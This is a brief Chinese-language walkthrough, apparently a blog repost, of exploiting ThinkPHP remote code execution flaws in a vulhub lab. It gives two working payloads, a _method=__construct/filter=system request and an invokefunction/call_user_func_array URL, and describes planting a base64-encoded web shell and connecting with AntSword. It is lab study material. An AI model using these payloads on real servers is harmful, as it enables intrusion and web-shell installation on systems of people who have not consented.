进入vulhub靶场,启动环境。访问http://ip:8080测试靶场是否正常启动
使用hcakbar工具,构造payload,构造完毕后点击Execute
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=
命令执行成功
使用phpinfo验证漏洞
写入一句话木马,一句话木马要进行base64编码
进入容器,查看木马文件是否写入
然后使用蚁剑连接
成功getshell
进入vulhub靶场。启动环境
http://192.168.116.166:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
代码执行成功说明存在远程代码执行漏洞
待更新
原文:https://www.cnblogs.com/pursue-security/p/15306776.html